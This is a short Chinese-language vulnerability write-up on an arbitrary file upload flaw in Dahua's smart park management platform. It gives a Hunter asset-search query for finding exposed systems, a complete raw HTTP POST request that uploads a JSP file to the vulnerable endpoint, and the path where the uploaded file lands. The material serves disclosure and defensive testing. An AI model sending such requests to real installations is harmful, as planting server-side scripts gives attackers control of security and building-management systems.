大华智慧园区综合管理平台publishing任意文件上传漏洞
发布时间
阅读量:
阅读量
大华智慧园区综合管理平台存在文件上传漏洞,攻击者可通过POST /publishing/publishing/material/file/video接口任意上传文件,导致系统被攻击与控制。漏洞位于平台地址/publishing/publishing/material/file/video和/publishingImg/VIDEO/230812162057144051.jsp,可利用Java/1.8.0_381浏览器请求复现。
一、漏洞简介
大华智慧园区综合管理平台整合了智能化、信息化、网络化、安全化等多元功能,致力于为园区提供全方位的综合管理服务,涵盖安防、能源管理、环境监测、人员管理、停车管理等多个领域。该平台存在文件上传漏洞,攻击者可通过该平台的publishing/publishing/material/file/video接口任意上传文件,导致系统被攻击并被恶意控制。
二、影响版本
- 大华智慧园区综合管理平台
三、资产测绘
- hunter
app.name="Dahua 大华 智慧园区管理平台" - 登录页面

四、漏洞复现
POST /publishing/publishing/material/file/video HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 287
--00content0boundary00
Content-Disposition: form-data; name="Filedata"; filename="1ndex.jsp"
test
--00content0boundary00
Content-Disposition: form-data; name="file"
file
--00content0boundary00
Content-Disposition: form-data; name="Submit"
submit
--00content0boundary00--

上传文件位置:
http://xx.xx.xx.xx/publishingImg/VIDEO/230812162057144051.jsp

全部评论 (0)
还没有任何评论哟~
